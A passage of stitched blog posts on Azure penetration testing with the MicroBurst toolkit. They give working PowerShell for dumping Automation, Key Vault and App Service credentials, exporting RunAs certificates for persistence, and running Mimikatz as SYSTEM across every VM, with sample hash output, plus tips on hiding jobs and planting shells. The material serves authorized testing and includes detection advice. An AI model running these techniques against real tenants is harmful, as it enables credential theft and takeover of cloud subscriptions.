    • This is how Azure defines the high level organization unit for runbooks
    • Automation accounts are the container for runbooks
    • Subscription inherited (Owner/Contributor/Reader) IAM/Access control roles are applied at this level
  • Runbook
    • This is the specific code/script/workflow that you would run under an automation account
    • Typically PowerShell, Python, or a Workflow
    • These can also contain sensitive data, so looking over the code can be useful
  • Automation credential
    • These are the credentials used by the Runbook to accomplish tasks
    • Frequently set up as a privileged (contributor) account
    • There are two types of credentials
      • Traditional username/password
      • RunAs certificates

Both types of credentials (Passwords/RunAs) can typically be used to get access to subscriptions via the Azure PowerShell cmdlets.

Passwords versus Certificates

Automation Credentials are a cleartext username and password that you can call within a runbook for authentication. So if you're able to create a runbook, you can export these from the Automation account. If these are domain credentials, you should be able to use them to authenticate to the subscription.  I already covered the cleartext automation credentials in a previous post, so feel free to read up more about those there.


Surprisingly, I have found several instances where the automation credential account is set up with Global Administrator permissions for the Azure tenant, and that can lead to some interesting escalation opportunities.


The primary (and more common) option for running Runbooks is with a RunAs certificate. When creating a RunAs certificate, a RunAs account is registered as a Service Principal in Azure AD for the certificate/account. This "App" account is then granted the Contributor role on the subscription. While some Azure admins may lock down the permissions for the account, we typically see these accounts as an opportunity to escalate privileges in an Azure environment.

If a "regular", lesser privileged user, has rights to create/run/modify Runbooks, they inherently have Contributor level rights for the subscription. While this is less likely, there is a chance that a user may have been granted contributor rights on an automation account. Check out this post by Microsoft for a full rundown of Automation Account Role Based Access Controls. At a high level, the subscription Owner and Contributor roles will have full access to Automation accounts.

Regardless of the privilege escalation element, we may also want to maintain access to an Azure environment after our initial account access is removed. We can do that by exporting RunAs certificates from the Automation account. These certificates can be used later to regain access to the Azure subscription.

Exporting Certificates

You will need to start by grabbing a copy of MicroBurst from the NetSPI Github.

The script (Get-AzurePasswords) was previously released, and already had the ability to dump the cleartext passwords for Automation accounts. If that is not an option for an Automation account that you're attacking, you now have the functionality to export a PFX file for authentication.

The script will run an Automation Runbook on the subscription that exports the PFX file and writes it out to a local file. Once that is complete, you should have a ps1 file that you can use to automate the login for that RunAs account. I initially had this script pivoting the PFX files out through a Storage Account container, but found an easier way: just cast the files as Base64 and export them through the job output.
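The in-runbook export boils down to just a few lines. This is a rough sketch of the idea rather than the exact runbook that the script deploys; the certificate name and export password below are placeholders:

# Pull the RunAs certificate out of the Automation Account's certificate store
$cert = Get-AutomationCertificate -Name 'AzureRunAsCertificate'

# Export it as a password-protected PFX and write it to the job output as Base64
$pfxBytes = $cert.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Pfx, 'EXPORT_PASSWORD')
Write-Output ([Convert]::ToBase64String($pfxBytes))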

Example Command:

Get-AzurePasswords -Keys N -AppServices N -Verbose


Using the Authentication

The initial need for collecting automation certificates came from a recent assessment where I was able to pull down cleartext credentials for an automation account, but multi-factor authentication got in the way of actually using the credentials. In order to maintain contributor level access on the subscription, I needed to gather Automation certificates. If the initial access account was burned, I would still have multiple contributor accounts that I could fall back on to maintain access to the Azure subscription.

It's important to make a note about permissions here. Contributor access on the subscription inherently gives you contributor rights on all of the virtual machines.

As mentioned in a previous post, Contributor rights on Virtual Machines grants you SYSTEM on Windows and root on Linux VMs. This is really handy for persistence.

When running the AuthenticateAs scripts, make sure that you are running as a local Administrator. You will need the rights to import the PFX file.
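For context, the exported "AuthenticateAs" script is doing roughly the following; this is a hedged outline rather than the exact exported file, and the tenant/application IDs and PFX password are placeholders:

# Import the exported PFX into the local machine store (this is why local admin rights are needed)
$pfxPassword = ConvertTo-SecureString 'PFX_PASSWORD' -AsPlainText -Force
$cert = Import-PfxCertificate -FilePath .\AuthenticateAs-RunAs.pfx -CertStoreLocation Cert:\LocalMachine\My -Password $pfxPassword

# Log in to AzureRM as the RunAs service principal using the imported certificate
Add-AzureRmAccount -ServicePrincipal -TenantId 'TENANT_ID' -ApplicationId 'APPLICATION_ID' -CertificateThumbprint $cert.Thumbprint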

It's not very flashy, but here is a GIF that shows what the authentication process looks like.


One important note about the demo GIF:

I purposefully ran the Get-AzureRmADUser command to show that the RunAs account does not have access to read AzureAD. On the plus side, that RunAs account does have contributor rights on all of the virtual machines. So at a minimum, we can maintain access to the Azure VMs until the certificate is revoked or expires.

In most cases, you should be able to run the "AuthenticateAs" ps1 scripts as they were exported. If the automation RunAs Service Principal account (Example: USER123_V2h5IGFyZSB5b3UgcmVhZGluZyB0aGlzPw==) has been renamed (Example: User123), the "AuthenticateAs" ps1 script will most likely not work. If that is the case, you will need to grab the Application ID for the Automation account and add it to the script. You may have to search/filter a little to find it, but this ID can be found with the following AzureRM command:
Get-AzureRmADServicePrincipal | select DisplayName,ApplicationId


The script will prompt you if the account has been renamed, so keep an eye out for the warning text.

The AppIDs are also captured in the Domain_SPNs.csv (in the Resources folder) output from the Get-AzureDomainInfo function in MicroBurst.

Next Steps

Since I've been seeing a mix of standard Automation credentials and RunAs certificates lately, I wanted to have a way to export both to help maintain a persistent connection to Azure during an assessment. In the next two blogs, I'll cover how we can make use of the access to get more sensitive information from the subscription, and potentially escalate our privileges.

Running PowerShell on Azure VMs at Scale

Let's assume that you're on a penetration test, where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have "Contributor" rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you're lucky, an overly friendly admin may have added the domain users group as contributors for a subscription. Alternatively, we can assume that we started with a lesser privileged user and escalated up to the contributor account. At this point, we could try to gather available credentials, dump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purpose of this post, let's assume that we've exhausted the read-only options and we're still stuck with a somewhat privileged user that doesn't allow us to pivot to other subscriptions (or the internal domain). At this point we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that's noisy and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let's try for command execution on the VMs. In this example environment, let's assume that none of the VMs are publicly exposed and you don't want to open any firewall ports to allow for RDP or other remote management protocols. Even without remote management protocols, there are a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module). This handy command will allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System. That's right… VM command execution as System.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
Let's break down the parameters:
  • ResourceGroupName - The Resource Group for the VM
  • VMName - The name of the VM
  • CommandId - The stored type of command to run through Azure.
    • "RunPowerShellScript" allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath - This is the path to your PowerShell PS1 file that you want to run
You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test
In this example, we've added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it's been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in).
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)
 .## ^ ##.  
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1] : Code : ComponentStatus/StdErr/succeeded 
Level : Info 
DisplayStatus : Provisioning succeeded 
Message : 
Status : Succeeded 
Capacity : 0 
Count : 0
This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I've added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst For our demo, we'll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.
Import-Module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds
The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 minutes and 14 seconds. It's not ideal (see below), but it's functional. I haven't taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That's nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:
  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for Sensitive Files (see the sketch after this list)
  • Run domain information gathering scripts on one VM and use the output to target other specific VMs for code execution
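As an example of the file-search idea above, here is a hedged sketch of a small script that you could push out with Invoke-AzureRmVMRunCommand. The paths and search strings are just examples, not part of MicroBurst:

# search-files.ps1 - look for files that commonly contain credentials on the target VM
Get-ChildItem -Path 'C:\Users', 'C:\inetpub' -Recurse -Include *.config, *.ps1, *.txt -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password', 'connectionstring' -SimpleMatch -List |
    Select-Object -Unique Path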

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands. Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders that are reading this, please be careful with your Owner and Contributor rights. If you have one takeaway from the post, let it be this - Contributor rights means SYSTEM rights on all the VMs. If you want to cut down your contributors' rights to execute these commands, create a new role for your contributors and limit the Microsoft.Compute/virtualMachines/runCommand/action permissions for your users.

Additionally, if you want to detect this, keep an eye out for the "Run Command on Virtual Machine" log entries. It's easy to set up alerts for this, and unless Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command. The following alert logic will let you know when anyone tries to use this command (Success or Failure). You can also extend the scope of this alert to all VMs in a subscription.

As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst Github page.

Anonymously Enumerating Azure Services

Microsoft makes use of a number of different domains/subdomains for each of their Azure services. We've previously covered some of these domains in a post about using trusted Azure domains for red team activities, but this time we're going to focus on finding existing Azure subdomains as part of the recon process. Also building off of another previous post, where we talked about enumerating Azure storage accounts and public blob files, the script included in this post will do DNS brute forcing to find existing Azure service subdomains.

So why do we want to do this? Let's say that we're doing a pen test against a company (TEST_COMPANY). As part of the recon process, we would want to see if TEST_COMPANY uses any Azure services. If we can confirm a DNS host name for TEST_COMPANY.azurewebsites.net, there's a pretty good chance that there's a TEST_COMPANY website hosted on that Azure host. We can follow a similar process to find additional public facing services for the rest of the domains listed below.

Domains / Associated Services

Here's a list of Azure-related domains that I've identified:

Domain                           Associated Service
azurewebsites.net                App Services
scm.azurewebsites.net            App Services - Management
p.azurewebsites.net              App Services
cloudapp.net                     App Services
file.core.windows.net            Storage Accounts - Files
blob.core.windows.net            Storage Accounts - Blobs
queue.core.windows.net           Storage Accounts - Queues
table.core.windows.net           Storage Accounts - Tables
redis.cache.windows.net          Databases - Redis
documents.azure.com              Databases - Cosmos DB
database.windows.net             Databases - MSSQL
vault.azure.net                  Key Vaults
onmicrosoft.com                  Microsoft Hosted Domain
mail.protection.outlook.com      Email
sharepoint.com                   SharePoint
azureedge.net                    CDN
search.windows.net               Search Appliance
azure-api.net                    API Services

Note: I tried to get all of the Azure subdomains into this script but there's a chance that I missed a few. Feel free to add an issue to the repo to let me know if I missed any important ones.

The script for doing the subdomain enumeration relies on finding DNS records for permutations on a base word. In the example below, we used test12345678 as the base word and found a few matches. If you cut the base word to "test123", you will find a significant number of matches (azuretest123, customertest123, dnstest123) with the permutations. While not every Azure service is going to contain the keywords of your client or application name, we do frequently run into services that share names with their owners.
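At its core, the enumeration is just a DNS resolution loop over permutations of the base word. The snippet below is a trimmed-down sketch of that idea; the real Invoke-EnumerateAzureSubDomains script covers the full domain list and a much larger permutations file:

$base = "test12345678"
$words = @("", "dev", "test", "qa", "prod")
$domains = @("azurewebsites.net", "blob.core.windows.net", "database.windows.net", "vault.azure.net")

foreach ($word in $words) {
    foreach ($domain in $domains) {
        foreach ($name in @("$base$word", "$word$base")) {
            # Any name that resolves is an existing Azure service
            if (Resolve-DnsName "$name.$domain" -ErrorAction SilentlyContinue) { Write-Output "Found: $name.$domain" }
        }
    }
}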

Github/Code Info

The script is part of the MicroBurst GitHub repo and it makes use of the same permutations file (Misc/permutations.txt) from the blob enumeration script.

Usage Example

The usage of this tool is pretty simple.

  • Download the code from GitHub – https://github.com/NetSPI/MicroBurst
  • Load up the module
    • Import-Module .\Invoke-EnumerateAzureSubDomains.ps1
    • or load the script file into the PowerShell ISE and hit F5

Example Command:

Invoke-EnumerateAzureSubDomains -Base test12345678 -Verbose


If you’re having issues with the PowerShell execution policy, I still have it on good authority that there are at least 15 different ways that you can bypass the policy.

Practical Use Cases

The following are a couple of practical use cases for dealing with some of the subdomains that you may find.

App Services - (azure-api.net, cloudapp.net, azurewebsites.net)
As we noted in the first section, the azurewebsites.net domains can indicate existing Azure hosted websites. While most of these will be standard/existing websites, you may get lucky and run into a dev site, or a pre-production site that was not meant to be exposed to the internet. Here, you may have luck finding application security issues, or sensitive information that is not supposed to be internet facing.

It is worth noting that the scm subdomains (test12345678.scm.azurewebsites.net) are for site management, and you should not be able to access those without proper authorization. I don't think it's possible to misconfigure the scm subdomains for public access, but you never know.

Storage Accounts - (file, blob, queue, table.core.windows.net)
Take a look at this previous post and use the same keywords that you find with the subdomain enumeration to see if the discovered storage accounts have public file listings.

Email/SharePoint/Hosted Domain - (onmicrosoft.com, mail.protection.outlook.com, sharepoint.com)
This one is pretty straightforward, but if a company is using Microsoft for email filtering, SharePoint, or if they have a domain that is registered with "onmicrosoft.com", there's a strong indication that they've at least started to get a presence in Azure/Office365.

Databases (database.windows.net, documents.azure.com, redis.cache.windows.net)
Although it's unlikely, there is a chance that Azure database services are publicly exposed, and that there are default credentials on the databases that you find on Azure. Additionally, someone would need to be pretty friendly with their allowed inbound IPs to allow all IPs access to the database, but crazier things have happened.


Subdomain Takeovers
It may take a while to pay off, but enumerating existing Azure subdomains may be handy for anyone looking to do subdomain takeovers. Subdomain takeovers are usually done the other way around (finding a domain that's no longer registered/in use), but by finding the domains now, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers. While testing this script, I found that there's already a few people out there squatting on some existing subdomains (amazon.azurewebsites.net).

Wrap Up

Hopefully this is useful for recon activities for Azure pen testing. Since this active method is not perfect, make sure that you're keeping an eye out for the domains listed above while you're doing more passive recon activities. Feel free to let me know in the comments (or via a pull request) if you have any additional Azure/Microsoft domains that should be added to the list.

Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions

During different types of assessments (web app, network, cloud), we will run into situations where we obtain domain credentials that can be used to log into Azure subscriptions. Most commonly, we will externally guess credentials for a privileged domain user, but we’ve also seen excessive permissions in web applications that use Azure AD for authentication. If we’re really lucky, we’ll have access to a user that has rights (typically Owner or Contributor) to access sensitive information in the subscription. If we have privileged access, there are three specific areas that we typically focus on for gathering credentials:
  • Key Vaults
  • App Services Configurations
  • Automation Accounts
There are other places that application/domain credentials could be hiding (See Storage Account files), but these are the first couple of spots that we want to check for credentials. In this post, we’ll go over the key areas where credentials are commonly found and the usage of a PowerShell script (a part of MicroBurst) that I put together to automate the process of gathering credentials from an Azure environment.

Key Vaults

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores. Here’s a quick overview of setting permissions for Key Vaults - https://docs.microsoft.com/en-us/azure/key-vault/key-vault-secure-your-key-vault

For dumping Key Vault values, we’re using some standard Azure PowerShell commands:
  • Get-AzureKeyVaultKey
  • Get-AzureKeyVaultSecret
If you’re just looking at exporting one or two secrets, these commands can be run individually. But since we’re typically trying to access everything that we can in an Azure subscription, we’ve automated the process in the script. The script will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificates locally with the -ExportCerts flag. With access to the keys, secrets, and certificates, you may be able to use them to pivot through systems in the Azure subscription. Additionally, I’ve seen situations where administrators have stored Azure AD user credentials in the Key Vault.
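For a quick one-off check, the individual commands look something like this (the vault and secret names are placeholders):

# List the secret names in a single vault, then pull one value in cleartext
Get-AzureKeyVaultSecret -VaultName 'TargetVault' | Select-Object Name
(Get-AzureKeyVaultSecret -VaultName 'TargetVault' -Name 'AppPassword').SecretValueText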

App Services Configurations

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using App Services, and the configurations (passwords) are pushed to the applications via the App Services profiles. In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

For dumping App Services configurations, we’re using the following AzureRM PowerShell commands:
  • Get-AzureRmWebApp
  • Get-AzureRmResource
  • Get-AzureRmWebAppPublishingProfile
Again, if this is just a one-off configuration dump, it’s easy to grab the profile from the web portal. But since we’re looking to automate this process, we use the commands above to list out the available apps and profiles for each app. Once the publishing profile is collected by the script, it is then parsed and credentials are returned in the final output table. Potential next steps include uploading a web shell to the App Services web server, or using any parsed connection strings included in the deployment to access the databases. With access to the databases, you could potentially use them as a C2 channel. Check out Scott’s post for more information on that.
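If you want to see what the script is parsing, a single app's profile can be pulled and picked apart manually. This is a hedged sketch of that process (the resource selection and output path are just examples):

# Grab the first web app in the subscription and download its publish profile XML
$app = Get-AzureRmWebApp | Select-Object -First 1
[xml]$profile = Get-AzureRmWebAppPublishingProfile -ResourceGroupName $app.ResourceGroup -Name $app.Name -OutputFile "$env:TEMP\profile.xml"

# The deployment usernames/passwords live in the publishProfile attributes
$profile.publishData.publishProfile | Select-Object profileName, publishUrl, userName, userPWD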

Automation Accounts

Automation accounts are one of the ways that you can automate tasks on Azure subscriptions. As part of the automation process, Azure allows these accounts to run code in the Azure environment. This code can be PowerShell or Python, and it can also be very handy for pentesting activities.

The automation account credential gathering process is particularly interesting, as we will have to run some PowerShell in Azure to actually get the credentials for the automation accounts. This section of the script will deploy a Runbook as a ps1 file to the Azure environment in order to get access to the credentials. Basically, the automation script is generated in the tool and includes the automation account name that we're gathering the credentials for.
$myCredential = Get-AutomationPSCredential -Name 'ACCOUNT_NAME_HERE'
$userName = $myCredential.UserName
$password = $myCredential.GetNetworkCredential().Password
write-output "$userName"
write-output "$password"
This Microsoft page was a big help in getting this section of the script figured out. Dumping these credentials can take a minute, as the automation script needs to be spooled up and run on the Azure side. This method of grabbing Automation Account credentials is not the most OpSec-safe approach, but the script does attempt to clean up after itself by deleting the Runbook. As long as the Runbook is successfully deleted at the end of the run, all that will be left is an entry in the Jobs page.

To help with obscuring these activities, the script generates 15-character job names for each Runbook, so it's hard to tell what was actually run. If you want, you can modify the jobName variable in the code to name it something a little more in line with the tutorial names, but the random names help prevent issues with naming conflicts.

Since the Automation Account credentials are user-generated, there's a chance that the passwords are being reused somewhere else in the environment, but your mileage may vary.

Script Usage

In order for this script to work, you will need to have the AzureRM and Azure PowerShell modules installed. Both modules have different ways to access the same things, but together, they can access everything that we need for this script.
  • Install-Module -Name AzureRM
  • Install-Module -Name Azure
The script will prompt you to install them if they're not already installed, but it doesn't hurt to get those installed before we start.

*Update (3/19/20) - I've updated the scripts to be Az module compliant, so if you're already using the Az modules, you can use Get-AzPasswords (versus Get-AzurePasswords) instead.

The usage of this tool is pretty simple.
  1. Download the code from GitHub - https://github.com/NetSPI/MicroBurst
  2. Load up the module
    1. Import-Module .\Get-AzurePasswords.ps1
    2. or load the script file into the PowerShell ISE and hit F5
  3. Get-AzurePasswords -Verbose
    1. Either pipe to Out-Gridview or to Export-CSV for easier parsing
    2. If you’re not already authenticated to the Azure console, it will prompt you to login.
    3. The script will also prompt you for the subscription you would like to use
  4. Review your creds, access other systems, take over the environment
If you’re having issues with the PowerShell execution policy, I have it on good authority that there are at least 15 different ways that you can bypass the policy. Sample Output:
  • Get-AzurePasswords -Verbose | Out-GridView
*The PowerShell output above and the Out-Gridview output have been redacted to protect the privacy of my test Azure subscription. Alternatively, you can pipe the output to Export-CSV to save the credentials in a CSV. If you don’t redirect the output, the credentials will just be returned as data table entries.

Conclusion

There are a fair number of places where credentials can hide in an Azure subscription, and there are plenty of uses for these credentials while attacking an Azure environment. Hopefully this script helps automate your process for gathering those credentials. For those that have read "Pentesting Azure Applications", you may have noticed that they call out the same credential locations in the “Other Azure Services” chapter. I actually had most of this script written prior to the book coming out, but the book really helped me figure out the Automation account credential section. If you haven’t read the book yet, and want a nice deep dive on Azure security, you can get it from No Starch Press - https://nostarch.com/azure

Anonymously Enumerating Azure File Resources

In recent years, we have seen Microsoft Azure services gathering a larger market share in the cloud space. While they're not seeing quite the adoption that AWS has, we are running into more clients that are using Microsoft Azure services for their operations. If everything is configured correctly, this can be totally fine, but it's pretty rare for an environment to be perfectly secured (and that's why we do security testing). Given the increase in Azure usage, we wanted to dive deeper into automating our standard Azure testing tasks, including the enumeration of publicly available files. In this blog, we'll go over the different types of Azure file stores and how we can potentially enumerate and access publicly available "Blob" files.

Storage Accounts

One of the issues that we've seen within Azure environments is publicly exposing files through storage accounts. These issues are pretty similar to the issues that have come up around public S3 buckets (A good primer here). "Storage Accounts" are Microsoft's way of handling data storage in Azure. Each storage account has a unique subdomain assigned to it in the core.windows.net domain. For example, if I create the netspiazure storage account, I would have netspiazure.core.windows.net assigned to the account.


This subdomain structure also extends out to the different file types within the storage accounts:
  • Blobs - netspiazure.blob.core.windows.net
  • File Services - netspiazure.file.core.windows.net
  • Data Tables - netspiazure.table.core.windows.net
  • Queues - netspiazure.queue.core.windows.net

Blobs

For the purpose of this blog, we're just going to focus on the "Blobs", but the other data types are also interesting. Blobs are Microsoft's unstructured data storage objects. Most frequently, we're seeing them used for serving static public data, but we have found blobs being used to store sensitive information (config files, database backups, credentials). Given that Google is indexing about 1.2 million PDFs from the Azure "blob.core.windows.net" subdomain, I think there's pretty decent surface area here.

Permissions

The blobs themselves are stored within "Containers", which are basically folders. Containers have access policies assigned to them, which determine the level of public access that is available for the files.

If a container has a "Container" public access policy, then anonymous users can list and read any of the files that are in the container. The "Blob" public access policy still allows anonymous users to read files, but they can't list the container files. "Blob" permissions also prevent the basic confirmation of container names via the Azure Blob Service REST APIs.

Automation

Given the number of Azure environments that we've been running into, I wanted to automate our process for enumerating publicly available blob files. I'm partial to PowerShell, but this script could potentially be ported to other languages. Code for the script can be found on NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

At the core of the script, we're doing DNS lookups for blob.core.windows.net subdomains to enumerate valid storage accounts, and then brute-forcing container names using the Azure Blob Service REST APIs. Additionally, the Bing Search API can be used within the tool to find additional storage accounts and containers that are already publicly indexed. Once a valid container name is identified, we use the Azure Blob APIs again to see if the container allows us to list files via the "Container" public access policy.

To come up with valid storage account names, we start with a base name (netspi) and either prepend or append additional words (dev, test, qa, etc.) that come from a permutations wordlist file. The general idea for this script, along with parts of the permutations list, comes from a similar tool for AWS S3 buckets - inSp3ctor
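The container check itself is just an anonymous REST request, so you can sanity-check a single account/container pair without the full script. This is a hedged sketch, and the account and container names below are only examples:

$account = "netspidev"
$container = "backups"

try {
    # A 200 response with a listing means the container allows anonymous "Container"-level access
    $resp = Invoke-WebRequest -Uri "https://$account.blob.core.windows.net/${container}?restype=container&comp=list" -UseBasicParsing
    if ($resp.StatusCode -eq 200) { Write-Output "Public file listing: $account/$container" }
}
catch { Write-Output "No public listing for $account/$container" }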

Invoke-EnumerateAzureBlobs Usage

The script has five parameters:
  • Base - The base name that you want to run permutations on (netspi)
  • Permutations - The file containing words to use with the base to find the storage accounts (netspidev, testnetspi, etc.)
  • Folders - The file containing potential folder names that you want to brute force (files, docs, etc.)
  • BingAPIKey - The Bing API Key to use for finding additional public files
  • OutputFile - The file to write the output to
Example Output:
PS C:\> Invoke-EnumerateAzureBlobs -Base secure -BingAPIKey 12345678901234567899876543210123
Found Storage Account -  secure.blob.core.windows.net
Found Storage Account -  testsecure.blob.core.windows.net
Found Storage Account -  securetest.blob.core.windows.net
Found Storage Account -  securedata.blob.core.windows.net
Found Storage Account -  securefiles.blob.core.windows.net
Found Storage Account -  securefilestorage.blob.core.windows.net
Found Storage Account -  securestorageaccount.blob.core.windows.net
Found Storage Account -  securesql.blob.core.windows.net
Found Storage Account -  hrsecure.blob.core.windows.net
Found Storage Account -  secureit.blob.core.windows.net
Found Storage Account -  secureimages.blob.core.windows.net
Found Storage Account -  securestorage.blob.core.windows.net
Bing Found Storage Account - notrealstorage.blob.core.windows.net
Found Container - hrsecure.blob.core.windows.net/NETSPItest
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/SuperSecretFile.txt
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/TaxReturn.pdf
Found Container - secureimages.blob.core.windows.net/NETSPItest123
    Empty Public Container Available: https://secureimages.blob.core.windows.net/NETSPItest123?restype=container&comp=list
By default, both the "Permutations" and "Folders" parameters are set to the permutations.txt file that comes with the script. You can increase your chances for finding files by adding any client/environment specific terms to that file. Adding in a Bing API Key will also help find additional storage accounts that contain your base word. If you don't already have a Bing API Key set up, navigate to the "Cognitive Services" section of the Azure Portal and create a new "Bing Search v7" instance for your account. There's a free pricing tier that will get you up to 3,000 calls per month, which will hopefully be sufficient.

If you are using the Bing API Key, you will be prompted with an out-gridview selection window to select any storage accounts that you want to look at. There are a few publicly indexed Azure storage accounts that seem to hit on most company names. These accounts seem to be indexing documents for or data on multiple companies, so they have a tendency to frequently show up in your Bing results. Several of these accounts also have public file listings, so that may give you a large list of public files that you don't care about. Either way, I've had pretty good luck with the script so far, and hopefully you do too. If you have any issues with the script, feel free to leave a comment or pull request on the GitHub page.

Utilizing Azure Services for Red Team Engagements

Everything seems to be moving into the cloud, so why not move your red team infrastructure there too? Well… lots of people have already been doing that (see here), but what about using hosted services from a cloud provider to hide your activities within the safety of the provider’s trusted domains? That’s something that we haven’t seen as much of, so we decided to start investigating cloud services that would allow us to make use of subdomains from trusted domains.

There are multiple options for cloud providers, so for starters we will be just looking at Microsoft's Azure services. Each cloud provider offers similar services, so you may be able to apply these techniques to other providers.

Domain Reputation Overview

Given that Domain Fronting is kind of on its way out, we wanted to find alternative ways to use trusted domains to bypass filters. One of the benefits of using Azure cloud services for red team engagements is the inherent domain reputation that comes with the domains that are hosting your data (Phishing sites, Payloads, etc.).

